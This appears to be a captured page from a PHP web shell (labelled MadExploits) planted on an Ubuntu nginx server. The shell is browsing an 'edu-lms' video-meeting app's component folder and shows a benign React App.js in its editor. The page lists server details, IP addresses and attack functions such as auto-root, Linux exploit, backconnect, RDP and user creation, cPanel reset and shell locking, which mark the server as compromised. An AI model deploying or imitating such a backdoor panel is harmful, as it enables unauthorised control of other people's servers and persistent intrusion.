Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
edu-lms /
app /
edusewa /
components /
[ HOME SHELL ]
Name
Size
Permission
Action
AccessControl
[ DIR ]
drwxr-xr-x
Containers
[ DIR ]
drwxr-xr-x
Controls
[ DIR ]
drwxr-xr-x
MeetingDrawer
[ DIR ]
drwxr-xr-x
MeetingViews
[ DIR ]
drwxr-xr-x
Notifications
[ DIR ]
drwxr-xr-x
PeerAudio
[ DIR ]
drwxr-xr-x
Settings
[ DIR ]
drwxr-xr-x
VideoContainers
[ DIR ]
drwxr-xr-x
VideoWindow
[ DIR ]
drwxr-xr-x
App.js
977
B
-rw-r--r--
ChooseRoom.js
4.42
KB
-rw-r--r--
FullScreen.js
2.17
KB
-rw-r--r--
JoinDialog.js
11.1
KB
-rw-r--r--
LoadingView.css
48
B
-rw-r--r--
LoadingView.js
165
B
-rw-r--r--
ReactLazyPreload.js
192
B
-rw-r--r--
Room.js
8.76
KB
-rw-r--r--
Selectors.js
8.15
KB
-rw-r--r--
UnsupportedBrowser.js
3.9
KB
-rw-r--r--
appPropTypes.js
2.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : App.js
import React, { useEffect, Suspense } from 'react'; import { useParams } from 'react-router'; import { connect } from 'react-redux'; import Room from './Room'; // const Room = ReactLazyPreload(() => // import(/* webpackChunkName: "room" */ './Room') // ); const App = (props) => { const { room } = props.match.params; return <Room roomId={room} />; // useEffect(() => { // Room.preload(); // return; // }, []); // if (!room.joined) { // return <JoinDialog roomId={id} />; // } else { // return ( // <Suspense fallback={<LoadingView />}> // <Room /> // </Suspense> // ); // } }; // @NOTE: The connect() function connects a React component to a Redux store. It provides its connected component with the pieces of the data it needs from the store, and the functions it can use to dispatch actions to the store. const mapStateToProps = (state) => ({ room: state.room, }); export default connect(mapStateToProps)(App);
Close